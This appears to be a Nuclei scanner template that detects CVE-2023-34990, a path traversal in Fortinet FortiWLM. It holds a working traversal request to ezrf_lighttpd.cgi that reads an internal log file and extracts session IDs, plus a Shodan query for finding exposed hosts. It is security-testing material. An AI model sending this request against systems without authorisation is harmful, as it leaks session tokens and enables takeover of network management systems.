id: CVE-2023-34990

info:
  name: FortiWLM - Directory Traversal
  author: DhiyaneshDk
  severity: critical
  description: |
    A relative path traversal in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands via specially crafted web requests.
  impact: |
    Unauthenticated attackers can exploit path traversal through the imagename parameter in ezrf_lighttpd.cgi to read arbitrary files and potentially execute unauthorized code, compromising the entire Fortinet FortiWLM wireless LAN management system.
  remediation: |
    Update Fortinet FortiWLM to version 8.6.6 or 8.5.5 or later that validates file paths in ezrf_lighttpd.cgi and prevents directory traversal attacks.
  reference:
    - https://fortiguard.com/psirt/FG-IR-23-144
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-34990
    cwe-id: CWE-94,CWE-23
    epss-score: 0.72874
    epss-percentile: 0.98799
  metadata:
    max-request: 1
    shodan-query: title:"FortiWLM Login"
  tags: cve,cve2023,fortiwlm,lfi,cisa,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wlm/login?next=/wlm HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        internal: true
        dsl:
          - 'status_code == 200'
          - 'contains(body, "FortiWLM Login")'
        condition: and

  - raw:
      - |
        GET /ems/cgi-bin/ezrf_lighttpd.cgi?op_type=upgradelogs&imagename=../../../../../../../../../data/apps/nms/logs/httpd_error_log HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: response
        regex:
          - 'sessionid=([A-F0-9]+)'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210094544731f3c1aa12020cb1b150d1166bd5e853a14d2922affed369e94bfaa0af02202ad4e5f112cb2aa65be9dcb3878f4cdccaf072ca5a3aa5431d17b10fd0d23b41:922c64590222798bb761d5b6d8e72950